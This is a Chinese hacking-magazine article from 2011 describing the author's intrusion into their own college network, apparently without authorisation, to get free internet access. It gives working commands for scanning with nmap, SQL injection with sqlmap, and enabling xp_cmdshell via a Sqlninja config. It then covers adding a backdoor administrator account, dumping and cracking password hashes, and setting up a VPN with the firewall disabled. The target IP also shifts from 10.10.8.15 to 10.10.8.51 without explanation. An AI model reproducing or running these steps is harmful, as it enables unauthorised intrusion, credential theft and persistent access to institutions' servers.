Backtrack5 下渗透校园网

本文已发于《黑客防线》2011.10期

某次去机房突然看到了挂在墙上的网络拓扑图,从而了解整个学院的网络分布情况。正好泄露了网络拓扑结果,于是在了解拓扑结构的情况下,展开了一次渗透测试。在此题外话一句,不知为何现在的学校喜欢把网络拓扑图详细地贴在墙上,女友学校的网络拓扑图还竟然公开在学校的网站上,实在无语。我简略绘制本校的拓扑结构,如图1:

图1.jpg

整个学院内部用的 10.10.0.0 网段的IP地址,学院有 DHCP、DNS、Web、FTP 服务器,它们都共同位于 10.10.8.0 网段。

我们宿舍每个人的书桌下有网线插孔,从拓扑图中就可以看出,虽然没有开通上网,只要网线插上去,同样可以跨网段访问,默认没有 ACL 的。也就是对 Web 服务器可以访问的,经过扫描,还有不少内部网站,比如在线电影之类的。

我的想法是拿下某一台机器的权限,然后开个 VPN 来上网。为了长期使用,我选择了对服务器下手,先就选择了 Web 服务器。顺便说下,我主要用的 BackTrack5 作为渗透环境,所使用的大部分工具均来源于 BackTrack5 中。

Web 服务器是在 10.10.8.0 这个网段的,首先用 Nmap 对整个网段进行扫描:

root@bt:~# nmap -sS -p 80 10.10.8.1-254 --open

其中,-p 参数代表只扫描指定端口,参数后跟欲扫描的端口号;–open 表示结果只显示开放了 80 端口的主机;10.10.8.1-254 是 IP 地址的范围,指代 10.10.8.1~10.10.8.254,因为 255 是广播地址,所以只用扫到 254 即可。只用了 3 秒多,就扫描完了整个网段,结果如图 2:

图2.jpg

我选择了 10.10.8.15 这个目标站,因为它是 ASP.NET 架构的,如果有注入,较容易提权(后面事实证明的确非常好提权)。

打开以后竟然是一个旅游方面的网站,记得在学校某内部网站找到这个网站的链接,标明的是网络协会的,可见大学学生的东西有多杂。

随便点开了一则新闻的页面,然后用 sqlmap 扫描:

sqlmap.py -u "http://10.10.8.51/Web/News/Opiniondetail.aspx?id=54"

很快就返回了如下文字:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=53' AND 9442=9442 AND 'fVBu'='fVBu
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Microsoft SQL Server 2005
[*] shutting down at: 13:14:52

看来的确有注入,详细信息都在上面了,操作系统是 Windows 2003,IIS 6.0 以及数据库是 MSSQL 2005。立即看看数据库当前的用户名,提交如下命令:

./sqlmap.py -u "http://10.10.8.51/Web/News/Opiniondetail.aspx?id=54" --current-user

以下是从 sqlmap 返回的一长串信息中摘下的:

[13:35:28] [INFO] fetching current user
[13:35:28] [INFO] read from file '/pentest/database/sqlmap/output/10.10.8.51/session': sa
current user:    'sa'

显示了当前用户名是 sa,如果真的是 sa 权限,那么已经成功了一半以上了。提交以下命令查看当前用户的权限:

./sqlmap.py -u "http://10.10.8.51/Web/News/Opiniondetail.aspx?id=54" --privileges

摘下的关键返回信息,如下:

database management system users privileges:
[*] nx
[*] sa (administrator)

果然是 SA 权限,赶紧换成 Sqlninja,Backtrack5 中的 Sqlninja 是新版本,新版本的 Sqlninja 已经不和以前的配置方法一样了,需要先建一个配置文件。在终端中键入 touch conf.conf 建立一个配置文件,针对此次攻击,我的配置文件如下:

--httprequest_start--
GET http://10.10.8.51/Web/News/Opiniondetail.aspx?id=53';/**/__SQL2INJECT__ HTTP/1.1
Host: 10.10.8.51
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
Connection: close
--httprequest_end--

Sqlninja 的配置文件格式用了标准的 HTTP 请求,以 –httprequest_start– 和 –httprequest_end– 作为开始和结束,GET 中 URL 后面的 __SQL2INJECT__ 会被 Sqlninja 自动替换成相应的注入语句。

保存文件。由于 SQL Server2005 默认是禁用了 xp_cmdshell 的,所以首先需要恢复 xp_cmdshell 存储过程,键入命令:

root@bt:/pentest/database/sqlninja# ./sqlninja -m x -f conf.conf -d 1

-m 参数为攻击模式,x 参数为恢复 xp_cmdshell 存储过程;-f 用来指定配置文件;-d 后跟 1 可以注入时提交的 SQL 语句,方便学习,回显如下:

> >++++++++++++++++SQL Command++++++++++++++++
if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:5';
-------------------------------------------
[+] Target seems a SQL Server 2005
1: 2000
2: 2005
f: fingerprint and act accordingly
> 2
[+] Trying to reactivate xp_cmdshell using sp_configure...
++++++++++++++++SQL Command++++++++++++++++
exec master..sp_configure 'show advanced options',1;reconfigure;exec master..sp_configure 'xp_cmdshell',1;reconfigure
-------------------------------------------
[+] Checking whether xp_cmdshell is available
++++++++++++++++SQL Command++++++++++++++++
exec master..xp_cmdshell 'ping -n 5 127.0.0.1';
-------------------------------------------
[+] Yes ! Now xp_cmdshell is available

成功恢复 xp_cmdshell 了,接着开始执行系统命令。在终端键入:

./sqlninja -m c -f conf.conf

c 参数用来执行 xp_cmdshell。

root@bt:/pentest/database/sqlninja# ./sqlninja -m c -f conf.conf
Sqlninja rel. 0.2.6-rc2
Copyright (C) 2006-2011 icesurfer <[email protected]>
[+] Parsing conf.conf...
[+] Target is: 10.10.8.51:80
[+] Starting blind command mode. Use "exit" to be dropped back to your shell.
>

这时光标在“>”后面闪动,用于输入命令。我分别执行 net user lu4nx 123456/add、net localgroup administrators lu4nx /add 来添加一个名为 lu4nx 的管理员。

由于 Backtrack5 中的 mstsc 不太好用,我就在 Windows 里用 mstsc 登录了。 于是顺便在主机上建了一个 VPN。

登录远程桌面后,我用 wce.exe 抓出 Administrator 的 hash,然后用 Ophcrack 挂上 7G 的彩虹表跑出了密码,接着在“本地用户和组”中,右击 Administrator,选择属性,在“拨入”选项卡中,将“远程访问权限(拨入或 VPN)”改成“允许访问”,如图3:

图3.jpg

然后在“控制面板”——“路由和远程访问”,在相应的计算机名中点右键,选择“配置并启用路由和远程访问”,弹出的向导中选择“自定义配置”,勾选“VPN”访问和“NAT和基本防火墙”,完成向导后启用服务即可,只要保证 Server、Routing and Remote Access、Remote Registry 和 Workstation 四个服务开启了,关闭 Windows 防火墙即可。

然后在本地建立一个 VPN 连接,填入 IP、用户名和密码即可,如图4:

图4.jpg

本文主要综合使用了一下 BackTrack5 中的工具,本文纯属学习,勿用于其他用途:)